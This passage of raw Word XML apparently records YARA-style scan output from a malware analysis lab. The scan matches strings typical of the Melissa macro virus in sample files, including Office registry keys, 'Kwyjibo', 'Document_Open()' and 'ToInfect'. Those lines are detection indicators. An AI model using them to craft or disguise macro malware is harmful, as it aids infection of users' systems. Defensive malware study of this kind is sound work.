    <w:p w14:paraId="62728A9B" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8983:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C3B17" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8a21:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B3D8F1" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8b53:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22966B7F" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8dc5:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA6A7B9" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8ba0:$key2: Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D5413" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8db6:$key2: Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0F3E15" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9221:$key2: Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD9C06" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8b83:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE75757" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8df5:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590E712E" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8e87:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A18E3FB" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8ed7:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EEC7BC" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8f07:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E714FF0" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8f57:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C147F75" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x920e:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A7A1A" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xaa36:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DB260B" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xab2f:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364F2B5E" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xab80:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F97E8" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xa5ee:$fun1: GetNameSpaceC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B36232" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x90d7:$fun2: Private Sub Document_Open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCAD382" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8fef:$fun3: Private Sub Document_Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20F6AC" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>melissascan C:\Users\Hakka\Desktop\MalwareAnalysisLab\Lab6\Samples\0a56baab11a888b2741bffc5fe7a52596b58f1d8e842770b21de82bd12a20484</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A3F32A" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7cb6:$s1: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B43B18" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9072:$s3: ToInfect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184BE156" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0x7a66:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32105D03" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7b04:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CCFB7B" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7c36:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD86AC9" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7ea8:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B857756" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7c83:$key2: Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4001AC" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7e99:$key2: Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CFEBF" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8304:$key2: Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1015C85F" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7c66:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB495F7" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7ed8:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E9FA12" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7f6a:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B8079" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7fba:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC6612" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7fea:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E147849" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x803a:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225767C1" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x82f1:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E342BDC" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9b75:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02835B1C" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9cc0:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044AFFE4" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9d36:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C478294" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9e46:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6953CD" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8df1:$fun1: GetNameSpaceC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C0CD8B" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x81ba:$fun2: Private Sub Document_Open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549A20E4" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x80d2:$fun3: Private Sub Document_Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ECAB09" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>melissascan C:\Users\Hakka\Desktop\MalwareAnalysisLab\Lab6\Samples\ff05182a14ea139b331217159f327a24cf826ef1173262ae47823df7cbfa747c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6A5ACE" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8dd3:$s1: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A3ED8" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x7dfd:$s2: .Log`on "p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9AC2D" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xca54:$s3: ToInfect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F0DAB" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8b83:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C325C" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8c21:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1674DA14" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8d53:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDEDEE6" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8fc5:$key1: HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5019E8C8" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8da0:$key2: Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D042896" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0x8fb6:$key2: Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7395B37E" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9421:$key2: Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113E108" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8d83:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ACDE48" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8ff5:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD812A0" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9087:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F4CE2" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x90d7:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254552E5" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9107:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89D808" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x9157:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163197A1" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x940e:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0792C48C" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xb8c0:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AE629" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xb936:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC6851" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xcc39:$key3: Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142AD8D3" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xc7d3:$fun1: GetNameSpaceC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACCD19F" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x92d7:$fun2: Private Sub Document_Open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C16B1F" w14:textId="2E9298BB" w:rsidR="00351DDF" w:rsidRPr="0054426F" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x91ef:$fun3: Private Sub Document_Close()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00351DDF" w:rsidRPr="00544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6F"/>
    <w:rsid w:val="0005167C"/>
    <w:rsid w:val="00351DDF"/>
    <w:rsid w:val="003F0C73"/>
    <w:rsid w:val="0054426F"/>
    <w:rsid w:val="005F7786"/>
    <w:rsid w:val="00670F32"/>
    <w:rsid w:val="006C084D"/>
    <w:rsid w:val="007F0128"/>
    <w:rsid w:val="009E2FD7"/>
    <w:rsid w:val="00A20061"/>
    <w:rsid w:val="00A364DB"/>
    <w:rsid w:val="00BB6536"/>
    <w:rsid w:val="00D20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5659"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{49BB2A38-5A1C-45DF-A526-C37510A0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F7786"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005F7786"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A36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8384">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1978991318">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="437455909">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1819953327">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="266472841">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1349987358">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="116679919">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1363169496">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="260601326">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1675112831">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1683312638">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1589652334">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1038971467">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1096291286">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="112870375">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="566964786">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1245845411">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1222248108">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2130857032">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="5444197">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="955403734">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="447622248">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="847449225">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1925382648">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
